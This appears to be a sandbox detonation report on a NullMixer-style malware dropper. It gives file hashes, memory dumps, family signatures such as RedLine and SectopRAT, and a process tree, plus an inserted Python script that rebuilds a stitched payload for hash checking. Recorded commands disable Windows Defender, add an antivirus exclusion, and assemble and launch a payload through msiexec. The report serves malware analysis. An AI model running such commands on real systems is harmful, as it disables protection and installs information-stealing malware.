memory/1948-58-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1948-57-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1948-56-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1948-55-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/1948-51-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1948-50-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/2744-155-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/4516-160-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-HKIP4.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/2232-159-0x0000000000400000-0x0000000002DAA000-memory.dmp
memory/1948-174-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/1948-179-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1948-178-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1948-177-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1948-170-0x0000000000400000-0x000000000051C000-memory.dmp
memory/1948-176-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2764-185-0x0000000000400000-0x0000000000422000-memory.dmp
memory/4868-196-0x0000000005400000-0x000000000543C000-memory.dmp
memory/4868-195-0x00000000054D0000-0x00000000055DA000-memory.dmp
memory/4868-194-0x00000000053A0000-0x00000000053B2000-memory.dmp
memory/3852-197-0x0000000006AA0000-0x0000000006AD2000-memory.dmp
memory/3852-208-0x0000000006A80000-0x0000000006A9E000-memory.dmp
memory/3852-198-0x000000006EA30000-0x000000006EA7C000-memory.dmp
memory/4868-188-0x0000000005840000-0x0000000005E58000-memory.dmp
memory/1608-193-0x0000000000400000-0x0000000000422000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed0968d19e5ec37794.exe.log
| MD5 | e5352797047ad2c91b83e933b24fbc4f |
| SHA1 | 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772 |
| SHA256 | b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c |
| SHA512 | dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827 |
memory/4868-184-0x0000000000400000-0x0000000000422000-memory.dmp
memory/3852-209-0x00000000076B0000-0x0000000007753000-memory.dmp
memory/852-210-0x000000006EA30000-0x000000006EA7C000-memory.dmp
memory/3852-213-0x0000000007800000-0x000000000781A000-memory.dmp
memory/3852-212-0x0000000007E40000-0x00000000084BA000-memory.dmp
memory/3852-227-0x0000000007880000-0x000000000788A000-memory.dmp
memory/3852-228-0x0000000007A70000-0x0000000007B06000-memory.dmp
memory/3852-229-0x0000000007A00000-0x0000000007A11000-memory.dmp
memory/3852-230-0x0000000007A30000-0x0000000007A3E000-memory.dmp
memory/3852-243-0x0000000007A40000-0x0000000007A54000-memory.dmp
memory/3852-244-0x0000000007B40000-0x0000000007B5A000-memory.dmp
memory/3852-245-0x0000000007B20000-0x0000000007B28000-memory.dmp
memory/3852-248-0x0000000073640000-0x0000000073DF0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9766eada4001f2c97df052619c080b1d |
| SHA1 | 06c7382a24ce7789b963e9fc45cd36167453ea74 |
| SHA256 | e701766f82fdfa3bb8c329dfa0ebdd8c00978796748a7292cdfe87d831101e23 |
| SHA512 | 7146d321851989bd5925202e0efaf7ceee5b151420c33624bee854870d5ae6f9983f977446af60a2eeac0cc107e60f4e5e229256f98b3808bb95a1fc70bcf5a7 |
memory/852-253-0x0000000073640000-0x0000000073DF0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX1\PUVMYbL.81
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Fbu1EQ9.~I
| MD5 | b1c69eec40db9d006f8b4df8ac3c038e |
| SHA1 | 4fc32d07029329e1e6c374b6af8d1925b1f64546 |
| SHA256 | 5472aecb24e88b33c5455b9fe0617db16e2ced8016c4655a01c2eb44341671e5 |
| SHA512 | e7b4abc277c7901713f33285df92d64d26d1327943f775faf9d353401bafb7b0c9dff1ef519771bd417eec85155f9eeff74fb22976595d0e6d3472b6d17e3f9d |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\nPI8.L
| MD5 | e99d5f78660e8ea9d09045c7f1cba42c |
| SHA1 | 43ab1072c97572f4e8caefdcbe2d5aa211fd3087 |
| SHA256 | 3ab51aa79dc557f84729de1001f2ade7bd3900a3a953045de76124aa5e989b98 |
| SHA512 | 01fc6d11d6a70b352a89f27357323fd3c4b5d93bf3e6a5ee57ba0fa497b2c2665dd33dd0791a85db718debfc88b0b5a44c123964d2460f73e5caf8128b79b831 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Y2Yadq.8~
| MD5 | 6acc22b9c1abe535c6feac6a79db1a18 |
| SHA1 | eb94c578b2e6c1bae8a75027f08dcf513e8fb1b9 |
| SHA256 | e3870b1f5a9c3be9041d873253e6b0bd89c3fcf05a1a8469ac0e900bc49976ef |
| SHA512 | f99cdc1ff6bb82f73de85144b5be359b661f4bb820f3763d80314357fb7eb5fba812a0d055242e84f14381c4db4caa8fea461782e406e60685082cb8d8e06adf |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\lNOSCc5X.Dt
| MD5 | 36fb32e67fa42636817aca7805b49800 |
| SHA1 | ae6bdd4bafe6b4a8efeb0f98ac82d1ed4ef07164 |
| SHA256 | b040b87c723d23d79034a35fdc82c1f3de3052b489bb7b63e5a505afc5cb3e56 |
| SHA512 | 56ff53ce8c397867a0ad2f699d3e4441ef0695685636f702db93cb62ffc1c75d33559a92a9286c9f875f2ab2f77034579cc578da427c275c95503edaf78fc42e |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\490lw~.x
| MD5 | 6ba17599a0544b52b5ea5ae9d261658f |
| SHA1 | 73637edb407d1a8cb80836b19602611cc71dcdf7 |
| SHA256 | 2cfefd85953f6aab43cd102651b0a130dbefe37790fa4ca775539c497aa52168 |
| SHA512 | 5a0424546eb2609128812759fc0d49491562ffdc318597d9b6ef80544fd5d9e70083c91f0313e0bb6c934c5c3201a7a4f6f662b049c543ffe3765d8c665f91c2 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\B0zcq1x.o
| MD5 | a6b49368224db5ac48fea0e7215b39d9 |
| SHA1 | 7385c9cae70f58842c8337ddb038641515e71313 |
| SHA256 | fe29f2f6d0ea68365d1e4cf8dab5d6fbf3ea1683964bc1027299069251052262 |
| SHA512 | 7354e6ba9e478cb40d5efbc392cc911c05b9065bb01c05dfbafaf0ac0a609a07df14b4eb7ff4f18d11022d4c767e7c356a1f9510a249b399fe6b88ed82976e03 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Temp\_enU.W
| MD5 | 13d4be61d9d3c7da927d482b449ff09e |
| SHA1 | 57fab8c699c46ff55b74794027201210c001dd0b |
| SHA256 | 848085bcebccf4cb84fc3b87fe2d6e38b0d518713146bda312570b82148fa324 |
| SHA512 | ac59a4ff77d1d6059af0d20cc91ba9290c9f3116036dcca76bc2a8842137d1db5b5a4a988d7bd269b7072b1f136f5448e51f28bab8f105bcf9234cd471e0b378 |
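The seven small RarSFX1 files listed above are not executables on their own: the dropper's cmd line on this page (`eChO | SEt /P = "MZ" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + ... ..\_ENU.W & ... StaRT msiexec /y ..\_enU.W`) first writes a bare `MZ` magic into `PUVMYbL.81`, then binary-concatenates the fragments behind it into `_enU.W`, deletes the pieces and hands the result to `msiexec /y`, which calls the module's `DllRegisterServer`. The example below, added here and not part of the sandbox report, re-creates that stitching from recovered fragments so an analyst can rebuild the dropped module and hash it against the `_enU.W` entry above. The fragment bytes are constructed, so the resulting hash is not the report's; the parser and the case-insensitive name matching (the command refers to `PUVMYbl.81` while the file on disk is `PUVMYbL.81`) are the reusable part. It assumes that `echo|set /p ="MZ"` wrote exactly the two bytes `4D 5A` with no trailing newline, which is what that idiom is used for; check the recovered header fragment against the MD5 listed above rather than trusting the assumption.

```python
"""Rebuild a payload stitched with 'copy /b' from its on-disk fragments.

Added example, not part of the sandbox report.  The fragment contents are
constructed; only the command-line parsing and the reassembly are real.
"""
import hashlib
import re
import struct
from typing import Dict, List, Tuple

# 'copy [/y] /b a + b + c dest' followed by '&' (next cmd.exe command) or end of line.
COPY_B = re.compile(
    r"copy\s+(?:/y\s+)?/b\s+(?P<src>.+?)\s+(?P<dst>\S+)\s*(?:&|$)", re.I)

# Command line copied verbatim from the report's process tree.
CMDLINE = r'''"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81&CopY /y /B PUVMYbl.81 +B0zcQ1x.o +490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W&Del /Q *& StaRT msiexec /y ..\_enU.W'''


def parse_copy_b(cmdline: str) -> Tuple[List[str], str]:
    """Return (ordered source names, destination) of the copy /b in a cmd line."""
    m = COPY_B.search(cmdline)
    if not m:
        raise ValueError("no 'copy /b' concatenation in command line")
    parts = [p.strip() for p in m.group("src").split("+")]
    return [p for p in parts if p], m.group("dst")


def reassemble(cmdline: str, fragments: Dict[str, bytes]) -> bytes:
    """Concatenate fragments in command-line order.

    Names are matched case-insensitively, as NTFS does: the command says
    'PUVMYbl.81' while the file the report lists is 'PUVMYbL.81'.  A missing
    fragment raises KeyError, which is the right failure for a partial image.
    """
    by_name = {name.lower(): data for name, data in fragments.items()}
    blob = b""
    for name in parse_copy_b(cmdline)[0]:
        blob += by_name[name.lower()]
    return blob


def looks_like_pe(blob: bytes) -> bool:
    """MZ magic plus an e_lfanew that points at a 'PE\\0\\0' signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def sha256(blob: bytes) -> str:
    return hashlib.sha256(blob).hexdigest()


def build_constructed_fragments() -> Tuple[Dict[str, bytes], bytes]:
    """Constructed stand-in for the seven RarSFX1 files (NOT the real contents).

    The fake payload is MZ + zeroed DOS header + e_lfanew=0x40 + 'PE\\0\\0' +
    filler, cut at arbitrary offsets under the report's on-disk names.  The
    first piece is exactly b"MZ", modelling what 'echo|set /p ="MZ"' wrote.
    """
    payload = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40) + b"PE\0\0"
               + bytes(range(256)) * 4)
    names = ["PUVMYbL.81", "B0zcq1x.o", "490lw~.x", "lNOSCc5X.Dt",
             "Y2Yadq.8~", "nPI8.L", "Fbu1EQ9.~I"]
    cuts = [0, 2, 0x20, 0x44, 0x100, 0x200, 0x300, len(payload)]
    frags = {names[i]: payload[cuts[i]:cuts[i + 1]] for i in range(7)}
    return frags, payload


if __name__ == "__main__":
    frags, _ = build_constructed_fragments()
    order, dest = parse_copy_b(CMDLINE)
    rebuilt = reassemble(CMDLINE, frags)
    print(f"{' + '.join(order)} -> {dest}")
    print(f"PE header intact: {looks_like_pe(rebuilt)}  sha256: {sha256(rebuilt)}")
```

With the real fragments carved from the sandbox image, compare `sha256(rebuilt)` with the `_enU.W` SHA256 above; a mismatch means either a fragment was altered or the header assumption is wrong. Note that without `/b`, `copy` would stop at the first Ctrl-Z byte, so the flag is essential to the trick, which is why the detection should key on `/b` rather than on `copy` alone.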
memory/4076-264-0x0000000003340000-0x00000000033E6000-memory.dmp
memory/4076-265-0x00000000033F0000-0x0000000003483000-memory.dmp
memory/4076-267-0x00000000033F0000-0x0000000003483000-memory.dmp
memory/4076-268-0x00000000033F0000-0x0000000003483000-memory.dmp
memory/3028-269-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1056-270-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/4076-271-0x0000000000400000-0x000000000055D000-memory.dmp
memory/4076-280-0x00000000033F0000-0x0000000003483000-memory.dmp
memory/4076-281-0x0000000003490000-0x000000000423C000-memory.dmp
memory/4076-283-0x0000000004240000-0x00000000042CC000-memory.dmp
memory/4076-287-0x00000000042D0000-0x0000000004358000-memory.dmp
memory/4076-284-0x00000000042D0000-0x0000000004358000-memory.dmp
memory/4076-288-0x0000000000CB0000-0x0000000000CB1000-memory.dmp
memory/4076-289-0x0000000000CC0000-0x0000000000CC4000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240903-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2816 set thread context of 2540 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe |
| PID 2408 set thread context of 2696 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe |
| PID 1072 set thread context of 1828 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0961d5d40c7b937c7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-H1790.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed098e48a54663552b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0937c2dc68a2496.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed096e68af113.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe
"C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09a48dab921a3bda7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09e3a07534aa.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed094d15aaa9a48.exe
C:\Windows\SysWOW64\cmd.exe
